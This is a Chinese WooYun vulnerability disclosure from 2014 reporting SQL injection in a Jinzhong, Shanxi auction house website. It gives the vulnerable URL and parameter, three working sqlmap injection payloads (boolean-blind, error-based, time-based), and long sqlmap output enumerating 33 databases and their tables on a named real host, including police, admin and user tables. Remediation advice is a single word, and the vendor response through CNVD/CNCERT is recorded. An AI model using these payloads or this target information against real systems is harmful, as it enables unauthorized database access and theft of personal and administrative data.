当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-058937

漏洞标题:某省拍卖行严重SQL注入(33个数据库,410多张表沦陷)

相关厂商:山西省晋中市拍卖行

漏洞作者: Anonymous.L

提交时间:2014-04-30 11:11

修复时间:2014-06-14 11:12

公开时间:2014-06-14 11:12

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-04-30: 细节已通知厂商并且等待厂商处理中
2014-05-05: 厂商已经确认,细节仅向厂商公开
2014-05-15: 细节向核心白帽子及相关领域专家公开
2014-05-25: 细节向普通白帽子公开
2014-06-04: 细节向实习白帽子公开
2014-06-14: 细节向公众公开

简要描述:

sql注入漏洞,拿33个库,410张表。

详细说明:

1.先跑了下这个url:http://www.jzauction.com.cn/xwjt.php?xx=1183
先把dos下跑的截图上上来,由于数据库和表太多,待会我直接复制了:

1.png


发现目标,继续:

2.png


看,33个数据库:
available databases [33]:
[*] blfysj
[*] dssk
[*] hsfda
[*] information_schema
[*] jwhr
[*] jxfda
[*] jzfdasj
[*] jznj
[*] jznjsj
[*] jzpmasj
[*] jzyjs
[*] kfqsj
[*] klsj
[*] lsfda
[*] mysql
[*] paimai
[*] police
[*] pyfda
[*] qxfda
[*] root
[*] syfda
[*] test
[*] tgfda
[*] tuangou
[*] web
[*] xncoa
[*] xncsj
[*] xswjtsj
[*] xswsj
[*] xyfda
[*] ycfda
[*] ysfda
[*] zqfda
继续跑:好多表啊,看下面,截图都截不全,实在是太多了,等下我在漏洞证明里还是复制文件进去吧:

3.png


漏洞证明:

注入点:
Place: GET
Parameter: xx
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: xx=1183' AND 5153=5153 AND 'bpsV'='bpsV
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: xx=1183' AND (SELECT 3647 FROM(SELECT COUNT(*),CONCAT(CHAR(58,107,120,113,58),(SELECT (CASE WHEN (3647=3647) THEN 1 ELSE 0 END)),CHAR(58,121,114,115,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND 'uYsM'='uYsM
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: xx=1183' AND SLEEP(5) AND 'QTfz'='QTfz
---
[23:16:40] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0
数据库库名:
available databases [33]:
[*] blfysj
[*] dssk
[*] hsfda
[*] information_schema
[*] jwhr
[*] jxfda
[*] jzfdasj
[*] jznj
[*] jznjsj
[*] jzpmasj
[*] jzyjs
[*] kfqsj
[*] klsj
[*] lsfda
[*] mysql
[*] paimai
[*] police
[*] pyfda
[*] qxfda
[*] root
[*] syfda
[*] test
[*] tgfda
[*] tuangou
[*] web
[*] xncoa
[*] xncsj
[*] xswjtsj
[*] xswsj
[*] xyfda
[*] ycfda
[*] ysfda
[*] zqfda
下面的库对应的表分好了:
Database: tgfda
[9 tables]
+---------------------------------------+
| lfj_artic |
| lfj_cen |
| lfj_fid |
| lfj_jbb |
| lfj_member |
| lfj_roll |
| lfj_sort |
| lfj_tid |
| tsadmin |
+---------------------------------------+
Database: jznj
[12 tables]
+---------------------------------------+
| lfj_artic |
| lfj_cen |
| lfj_fid |
| lfj_member |
| lfj_roll |
| lfj_sort |
| lfj_tid |
| njbt |
| njts |
| tblnews |
| wjxz |
| zyadmin |
+---------------------------------------+
Database: jzpmasj
[17 tables]
+---------------------------------------+
| admin |
| jzxx |
| tblapprove |
| tblcase |
| tblcode |
| tbldoctype |
| tbldoctype_right |
| tbleventlog |
| tblmodule |
| tblnews |
| tblprivilege |
| tbluser |
| tblviewhist |
| title |
| vote |
| wjxz |
| xxxx |
+---------------------------------------+
Database: jzfdasj
[23 tables]
+---------------------------------------+
| admin |
| jzxx |
| lfj_artic |
| log |
| tblapprove |
| tblcase |
| tblcode |
| tbldoctype |
| tbldoctype_right |
| tbleventlog |
| tblmodule |
| tblnews |
| tblprivilege |
| tbluser |
| tblviewhist |
| title |
| vote |
| wjadmin |
| wjlog |
| wjxz |
| wjxz1 |
| xdradmin |
| xzxdr |
+---------------------------------------+
Database: jxfda
[11 tables]
+---------------------------------------+
| lfj_artic |
| lfj_cen |
| lfj_fid |
| lfj_jbb |
| lfj_member |
| lfj_roll |
| lfj_sort |
| lfj_tid |
| tsadmin |
| xdradmin |
| xzxdr |
+---------------------------------------+
Database: xncoa
[14 tables]
+---------------------------------------+
| jzxx |
| tblapprove |
| tblcase |
| tblcode |
| tbldoctype |
| tbldoctype_right |
| tbleventlog |
| tblmodule |
| tblnews |
| tblnewscal |
| tblprivilege |
| tbluser |
| tblviewhist |
| wjxz |
+---------------------------------------+
Database: qxfda
[9 tables]
+---------------------------------------+
| lfj_artic |
| lfj_cen |
| lfj_fid |
| lfj_jbb |
| lfj_member |
| lfj_roll |
| lfj_sort |
| lfj_tid |
| tsadmin |
+---------------------------------------+
Database: tuangou
[46 tables]
+---------------------------------------+
| cenwor_system_failedlogins |
| cenwor_system_log |
| cenwor_system_memberfields |
| cenwor_system_members |
| cenwor_system_onlinetime |
| cenwor_system_report |
| cenwor_system_robot |
| cenwor_system_robot_ip |
| cenwor_system_robot_log |
| cenwor_system_role |
| cenwor_system_role_action |
| cenwor_system_role_module |
| cenwor_system_sessions |
| cenwor_tttuangou_address |
| cenwor_tttuangou_catalog |
| cenwor_tttuangou_city |
| cenwor_tttuangou_express |
| cenwor_tttuangou_express_area |
| cenwor_tttuangou_express_cdp |
| cenwor_tttuangou_express_corp |
| cenwor_tttuangou_express_printer_log |
| cenwor_tttuangou_finder |
| cenwor_tttuangou_metas |
| cenwor_tttuangou_order |
| cenwor_tttuangou_order_clog |
| cenwor_tttuangou_paylog |
| cenwor_tttuangou_payment |
| cenwor_tttuangou_prize_phone |
| cenwor_tttuangou_prize_ticket |
| cenwor_tttuangou_prize_ticket_win |
| cenwor_tttuangou_product |
| cenwor_tttuangou_push_log |
| cenwor_tttuangou_push_queue |
| cenwor_tttuangou_push_template |
| cenwor_tttuangou_question |
| cenwor_tttuangou_recharge_card |
| cenwor_tttuangou_recharge_order |
| cenwor_tttuangou_regions |
| cenwor_tttuangou_seller |
| cenwor_tttuangou_service |
| cenwor_tttuangou_subscribe |
| cenwor_tttuangou_ticket |
| cenwor_tttuangou_uploads |
| cenwor_tttuangou_usermoney |
| cenwor_tttuangou_usermsg |
| cenwor_tttuangou_zlog |
+---------------------------------------+
Database: lsfda
[9 tables]
+---------------------------------------+
| lfj_artic |
| lfj_cen |
| lfj_fid |
| lfj_jbb |
| lfj_member |
| lfj_roll |
| lfj_sort |
| lfj_tid |
| tsadmin |
+---------------------------------------+
Database: police
[33 tables]
+---------------------------------------+
| tblapprove |
| tblarea |
| tblareasub |
| tblcase |
| tblcase_deal |
| tblcase_receive |
| tblcase_search |
| tblchargebill |
| tblchargebill_detail |
| tblcode |
| tblcourse |
| tblcourse_zhouqi |
| tbldoctype |
| tbldoctype_right |
| tbleventlog |
| tblhouse |
| tblmodule |
| tblnews |
| tblnewscal |
| tblpeople |
| tblpolice |
| tblprivilege |
| tblreturnbill |
| tblreturnbill_detail |
| tblshop |
| tblstudent |
| tblstudent_course |
| tblstudent_course_new |
| tbltest |
| tbluser |
| tblviewhist |
| tblvisit |
| tblvote |
+---------------------------------------+
Database: jznjsj
[12 tables]
+---------------------------------------+
| admin |
| tblapprove |
| tblcase |
| tblcode |
| tbldoctype |
| tbldoctype_right |
| tbleventlog |
| tblmodule |
| tblnews |
| tblprivilege |
| tbluser |
| tblviewhist |
+---------------------------------------+
Database: blfysj
[16 tables]
+---------------------------------------+
| admin |
| jzxx |
| tblapprove |
| tblcase |
| tblcode |
| tbldoctype |
| tbldoctype_right |
| tbleventlog |
| tblmodule |
| tblnews |
| tblprivilege |
| tbluser |
| tblviewhist |
| title |
| vote |
| wjxz |
+---------------------------------------+
Database: klsj
[12 tables]
+---------------------------------------+
| admin |
| tblapprove |
| tblcase |
| tblcode |
| tbldoctype |
| tbldoctype_right |
| tbleventlog |
| tblmodule |
| tblnews |
| tblprivilege |
| tbluser |
| tblviewhist |
+---------------------------------------+
Database: xswjtsj
[12 tables]
+---------------------------------------+
| admin |
| tblapprove |
| tblcase |
| tblcode |
| tbldoctype |
| tbldoctype_right |
| tbleventlog |
| tblmodule |
| tblnews |
| tblprivilege |
| tbluser |
| tblviewhist |
+---------------------------------------+
Database: pyfda
[9 tables]
+---------------------------------------+
| lfj_artic |
| lfj_cen |
| lfj_fid |
| lfj_jbb |
| lfj_member |
| lfj_roll |
| lfj_sort |
| lfj_tid |
| tsadmin |
+---------------------------------------+
Database: information_schema
[17 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| KEY_COLUMN_USAGE |
| PROFILING |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+
Database: syfda
[9 tables]
+---------------------------------------+
| lfj_artic |
| lfj_cen |
| lfj_fid |
| lfj_jbb |
| lfj_member |
| lfj_roll |
| lfj_sort |
| lfj_tid |
| tsadmin |
+---------------------------------------+
Database: xncsj
[19 tables]
+---------------------------------------+
| admin |
| jzxx |
| tblapprove |
| tblcase |
| tblcode |
| tbldoctype |
| tbldoctype20131128 |
| tbldoctype20131128new |
| tbldoctype_right |
| tbleventlog |
| tblmodule |
| tblnews |
| tblprivilege |
| tbluser |
| tblviewhist |
| tblwebset |
| title |
| vote |
| wjxz |
+---------------------------------------+
Database: kfqsj
[16 tables]
+---------------------------------------+
| admin |
| jzxx |
| tblapprove |
| tblcase |
| tblcode |
| tbldoctype |
| tbldoctype_right |
| tbleventlog |
| tblmodule |
| tblnews |
| tblprivilege |
| tbluser |
| tblviewhist |
| title |
| vote |
| wjxz |
+---------------------------------------+
Database: paimai
[5 tables]
+---------------------------------------+
| tblarea |
| tbldoctype |
| tblmanager |
| tblmember |
| tblnews |
+---------------------------------------+
Database: zqfda
[9 tables]
+---------------------------------------+
| lfj_artic |
| lfj_cen |
| lfj_fid |
| lfj_jbb |
| lfj_member |
| lfj_roll |
| lfj_sort |
| lfj_tid |
| tsadmin |
+---------------------------------------+
Database: dssk
[5 tables]
+---------------------------------------+
| tblarea |
| tbldoctype |
| tblmanager |
| tblmember |
| tblnews |
+---------------------------------------+
Database: mysql
[17 tables]
+---------------------------------------+
| columns_priv |
| db |
| func |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| proc |
| procs_priv |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
| user |
+---------------------------------------+
Database: xswsj
[15 tables]
+---------------------------------------+
| admin |
| tblapprove |
| tblcase |
| tblcode |
| tbldoctype |
| tbldoctype_right |
| tbleventlog |
| tblmodule |
| tblnews |
| tblprivilege |
| tbluser |
| tblviewhist |
| title |
| vote |
| wsbm |
+---------------------------------------+
Database: ysfda
[9 tables]
+---------------------------------------+
| lfj_artic |
| lfj_cen |
| lfj_fid |
| lfj_jbb |
| lfj_member |
| lfj_roll |
| lfj_sort |
| lfj_tid |
| tsadmin |
+---------------------------------------+
Database: jwhr
[5 tables]
+---------------------------------------+
| tbledu |
| tblgive |
| tbljob_person |
| tbljob_person_ori |
| tblwork |
+---------------------------------------+
Database: xyfda
[9 tables]
+---------------------------------------+
| lfj_artic |
| lfj_cen |
| lfj_fid |
| lfj_jbb |
| lfj_member |
| lfj_roll |
| lfj_sort |
| lfj_tid |
| tsadmin |
+---------------------------------------+
Database: hsfda
[9 tables]
+---------------------------------------+
| lfj_artic |
| lfj_cen |
| lfj_fid |
| lfj_jbb |
| lfj_member |
| lfj_roll |
| lfj_sort |
| lfj_tid |
| tsadmin |
+---------------------------------------+
Database: jzyjs
[12 tables]
+---------------------------------------+
| admin |
| lfj_artic |
| lfj_cen |
| lfj_fid |
| lfj_jbb |
| lfj_member |
| lfj_roll |
| lfj_sort |
| lfj_tid |
| title |
| tsadmin |
| vote |
+---------------------------------------+
Database: ycfda
[9 tables]
+---------------------------------------+
| lfj_artic |
| lfj_cen |
| lfj_fid |
| lfj_jbb |
| lfj_member |
| lfj_roll |
| lfj_sort |
| lfj_tid |
| tsadmin |
+---------------------------------------+

修复方案:

过滤

版权声明:转载请注明来源 Anonymous.L@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2014-05-05 08:40

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给山西分中心,由其后续联系网站管理单位处置。

最新状态:

暂无